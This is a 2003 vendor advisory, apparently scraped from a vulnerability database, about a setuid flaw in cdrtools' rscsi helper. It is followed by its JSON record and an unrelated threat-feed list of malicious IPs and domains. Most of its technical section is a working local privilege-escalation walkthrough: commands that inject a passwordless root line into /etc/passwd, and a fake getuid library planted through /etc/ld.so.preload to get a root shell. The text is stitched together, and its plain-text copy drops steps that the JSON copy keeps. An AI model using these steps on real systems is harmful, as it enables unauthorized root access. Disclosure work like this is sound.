ID SECURITYVULNS:DOC:4941 Type securityvulns Reporter Securityvulns Modified 2003-08-04T00:00:00
Description
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com
Our Mission:
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
Advisory Number : SRT2003-08-01-0126
Product : cdrtools (rscsi)
Version : Version <= cdrtools-2.x
Vendor : ftp://ftp.berlios.de/pub/cdrecord/
Class : local
Criticality : High
Operating System(s) : *nix
High Level Explanation
High Level Description : suid rscsi overwrites root owned files
What to do : chmod -s /opt/schily/sbin/rscsi
Technical Details
Proof Of Concept Status : SNO has PoC code for this issue
Low Level Description :
Cdrecord supports DVD-R and DVD-RW with all known DVD-writers on all UNIX
like operating systems and on Win32.
A setuid helper binary allows files to be overwritten by non root users.
One side effect of the overwritten file is that the permissions become
writable by the user calling the rscsi program. These issues can allow a
non root user to take local root on the machine that has cdrtools installed
Initial attempts to exploit this issue failed for an unknown reason... this
however may still be a valid method of attack. We make use of the first
argument passed to rscsi in order to choose the file we wish to write to.
Due to the output from rscsi we make use of 0x08 in order to delete some of
the characters that otherwise would be written. This attack method relys on
placing a line of text at the end of a file. Please note that 2 other lines
of garbage will be placed in the file which may cause other issues.
elguapo@gentoo elguapo $ echo C`echo -e
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` |
/opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)
elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash
When attempting to echo this line to the password file we get the following
error. Please note that the password file IS still overwritten at this point.
E0
Illegal user id for RSCSI server
0
elguapo@gentoo elguapo $ cat /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []
We DO however have other exploitation options such as the one listed below.
[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
Note that we now have write permissions to /etc/ld.so.preload
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
Time to take root
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Patch or Workaround : chmod -s /opt/schily/sbin/rscsi
Vendor Status : patched in cdrtools-2.01a18.tar.gz
Bugtraq URL : to be assigned
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
{"id": "SECURITYVULNS:DOC:4941", "bulletinFamily": "software", "title": "SRT2003-08-01-0126 - cdrtools local root exploit", "description": "Secure Network Operations, Inc. http://www.secnetops.com\r\nStrategic Reconnaissance Team research@secnetops.com\r\nTeam Lead Contact kf@secnetops.com\r\n\r\n\r\nOur Mission:\r\n************************************************************************\r\nSecure Network Operations offers expertise in Networking, Intrusion \r\nDetection Systems (IDS), Software Security Validation, and \r\nCorporate/Private Network Security. Our mission is to facilitate a \r\nsecure and reliable Internet and inter-enterprise communications \r\ninfrastructure through the products and services we offer. \r\n\r\n\r\nQuick Summary:\r\n************************************************************************\r\nAdvisory Number : SRT2003-08-01-0126\r\nProduct : cdrtools (rscsi)\r\nVersion : Version <= cdrtools-2.x\r\nVendor : ftp://ftp.berlios.de/pub/cdrecord/\r\nClass : local\r\nCriticality : High\r\nOperating System(s) : *nix\r\n\r\n\r\nHigh Level Explanation\r\n************************************************************************\r\nHigh Level Description : suid rscsi overwrites root owned files\r\nWhat to do : chmod -s /opt/schily/sbin/rscsi\r\n\r\n\r\nTechnical Details\r\n************************************************************************\r\nProof Of Concept Status : SNO has PoC code for this issue\r\nLow Level Description : \r\n\r\nCdrecord supports DVD-R and DVD-RW with all known DVD-writers on all UNIX\r\nlike operating systems and on Win32. \r\n\r\nA setuid helper binary allows files to be overwritten by non root users. \r\nOne side effect of the overwritten file is that the permissions become\r\nwritable by the user calling the rscsi program. These issues can allow a\r\nnon root user to take local root on the machine that has cdrtools installed\r\n\r\nInitial attempts to exploit this issue failed for an unknown reason... this\r\nhowever may still be a valid method of attack. We make use of the first \r\nargument passed to rscsi in order to choose the file we wish to write to.\r\n\r\nDue to the output from rscsi we make use of 0x08 in order to delete some of \r\nthe characters that otherwise would be written. This attack method relys on \r\nplacing a line of text at the end of a file. Please note that 2 other lines \r\nof garbage will be placed in the file which may cause other issues. \r\n\r\nelguapo@gentoo elguapo $ echo C`echo -e \r\n"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | \r\n/opt/schily/sbin/rscsi /tmp/lala\r\nSegmentation fault (this segfault is not related to the security issue)\r\n\r\nelguapo@gentoo elguapo $ cat /tmp/lala\r\nrscsid: user id 1000, name elguapo\r\nrmt: stdin is a PIPE\r\nr00t::0:0:root:/root:/bin/bash\r\n\r\nWhen attempting to echo this line to the password file we get the following \r\nerror. Please note that the password file IS still overwritten at this point. \r\n\r\nE0\r\nIllegal user id for RSCSI server\r\n0\r\n\r\nelguapo@gentoo elguapo $ cat /etc/passwd\r\nrscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server\r\nrscsid:>E 0 (Illegal user id for RSCSI server) []\r\n\r\nWe DO however have other exploitation options such as the one listed below. \r\n\r\n[kf@vegeta kf]$ ls -al /etc/ld.so.preload\r\nls: /etc/ld.so.preload: No such file or directory\r\n\r\n[kf@vegeta kf]$ cat > oops.c\r\nint getuid(void)\r\n{\r\nreturn(0);\r\n}\r\n\r\n[kf@vegeta kf]$ gcc -c -o oops.o oops.c\r\n[kf@vegeta kf]$ ld -shared -o oops.so oops.o\r\n[kf@vegeta kf]$ ls -al oops.so\r\n-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so\r\n\r\n[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload\r\nE0\r\nGarbage command\r\n0\r\n\r\nNote that we now have write permissions to /etc/ld.so.preload\r\n-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload\r\n\r\nTime to take root\r\n[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload\r\n[kf@vegeta kf]$ su\r\n[root@vegeta kf]# rm /etc/ld.so.preload\r\nrm: remove regular file `/etc/ld.so.preload'? y\r\n[root@vegeta kf]# id\r\nuid=0(root) gid=0(root)\r\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n\r\nPatch or Workaround : chmod -s /opt/schily/sbin/rscsi\r\n\r\nVendor Status : patched in cdrtools-2.01a18.tar.gz\r\n\r\nBugtraq URL : to be assigned\r\n\r\n------------------------------------------------------------------------\r\nThis advisory was released by Secure Network Operations,Inc. as a matter\r\nof notification to help administrators protect their networks against\r\nthe described vulnerability. Exploit source code is no longer released\r\nin our advisories. Contact research@secnetops.com for information on how\r\nto obtain exploit information.\r\n\r\n", "published": "2003-08-04T00:00:00", "modified": "2003-08-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4941", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:08", "edition": 1, "viewCount": 4, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-08-31T11:10:08", "rev": 2}, "dependencies": {"references": [{"type": "msupdate", "idList": ["MS:DD4D5F19-DF64-45E6-8467-BB181ACA09BC", "MS:85E79E57-0F9F-43C1-9F41-1339D2D2A12F", "MS:28934ABE-FFC8-439B-B81C-92B31D9212E4", "MS:2C4AA4B1-F417-490B-8552-C76F5B9A8807", "MS:588FEF17-5DD2-4764-9307-6853ED165362", "MS:8677B555-2CD1-4308-B911-65FA945A6530"]}, {"type": "cve", "idList": ["CVE-2014-2595", "CVE-2018-4941", "CVE-2015-9286", "CVE-2008-7273", "CVE-2019-4941", "CVE-2008-7272"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-2507.NASL", "OPENSUSE-2019-2503.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2503-1", "OPENSUSE-SU-2019:2507-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2BE2A8D4614AF39054B70A8077283E08"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154034"]}, {"type": "exploitdb", "idList": ["EDB-ID:47244"]}, {"type": "zdt", "idList": ["1337DAY-ID-33115"]}], "modified": "2018-08-31T11:10:08", "rev": 2}, "vulnersScore": 6.5}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **206[.]217.129.244** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **4**.\n First seen: 2020-07-31T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **generic**.\nASN 36352: (First IP 206.217.128.0, Last IP 206.217.143.255).\nASN Name \"ASCOLOCROSSING\" and Organisation \"ColoCrossing\".\nASN hosts 246469 domains.\nGEO IP information: City \"New York\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-07-31T00:00:00", "id": "RST:6D0CA36B-4941-3699-802B-6B5D7B2FA2DE", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 206.217.129.244", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **193[.]169.252.81** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **12**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **generic**.\nASN 197226: (First IP 193.169.252.0, Last IP 193.169.254.255).\nASN Name \"SPRINTSDC\" and Organisation \"\".\nASN hosts 53972 domains.\nGEO IP information: City \"\", Country \"Poland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:88CA5F2E-4941-302C-ADDA-46DB8E620C85", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 193.169.252.81", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **www[.]xianyang888.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **53**.\n First seen: 2021-03-04T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 47[.]96.66.133\nWhois:\n Created: 2020-09-25 14:44:38, \n Registrar: Alibaba Cloud Computing Beijing Co Ltd, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-04T00:00:00", "id": "RST:3714A4A6-4941-3F85-A084-C45E3C1C172C", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: www.xianyang888.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **37[.]205.37.50** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **12**.\n First seen: 2020-12-23T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **generic**.\nASN 59396: (First IP 37.205.32.0, Last IP 37.205.39.255).\nASN Name \"TRS\" and Organisation \"\".\nASN hosts 665 domains.\nGEO IP information: City \"Selfoss\", Country \"Iceland\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-23T00:00:00", "id": "RST:61FCF197-4941-37B6-AFDB-2CE68221DEA3", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 37.205.37.50", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **35[.]160.236.138** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **generic**.\nASN 16509: (First IP 35.154.0.0, Last IP 35.167.255.255).\nASN Name \"AMAZON02\" and Organisation \"Amazoncom Inc\".\nThis IP is a part of \"**amazon_cloud_ec2**\" address pools.\nASN hosts 14742129 domains.\nGEO IP information: City \"\", Country \"United States\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:A770FE78-4941-32F3-8863-D90ED0D5CB6E", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 35.160.236.138", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]189.86.141** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2020-01-25T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **generic**.\nASN 22884: (First IP 187.189.85.0, Last IP 187.189.86.255).\nASN Name \"TOTAL\" and Organisation \"PLAY TELECOMUNICACIONES SA DE CV\".\nASN hosts 3177 domains.\nGEO IP information: City \"Mexico City\", Country \"Mexico\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-01-25T00:00:00", "id": "RST:8460F160-4941-3348-BAAF-E42EB763C884", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 187.189.86.141", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **201[.]76.117.33** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **3**.\n First seen: 2020-03-05T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **generic**.\nASN 262794: (First IP 201.76.112.0, Last IP 201.76.127.255).\nASN Name \"HTEC\" and Organisation \"Telecomunicaes EIRELI\".\nASN hosts 26 domains.\nGEO IP information: City \"Montenegro\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-03-05T00:00:00", "id": "RST:A11F962A-4941-32B1-924D-62376B3F3CB8", "href": "", "published": "2021-02-27T00:00:00", "title": "RST Threat feed. IOC: 201.76.117.33", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **proxy[.]xmrig.info** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-02-18T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-02-18T00:00:00", "id": "RST:4A300DCF-4941-39F2-BBFB-07BF1BEBCE60", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: proxy.xmrig.info", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **functional[.]nanopool.org** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-17T00:00:00", "id": "RST:1B8CB205-4941-3F09-8D44-343FE14BC6B9", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: functional.nanopool.org", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **global6-65[.]dev.api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-17T00:00:00", "id": "RST:0F279743-4941-3A55-9F2A-56D623854E19", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: global6-65.dev.api.binance.com", "type": "rst", "cvss": {}}]}
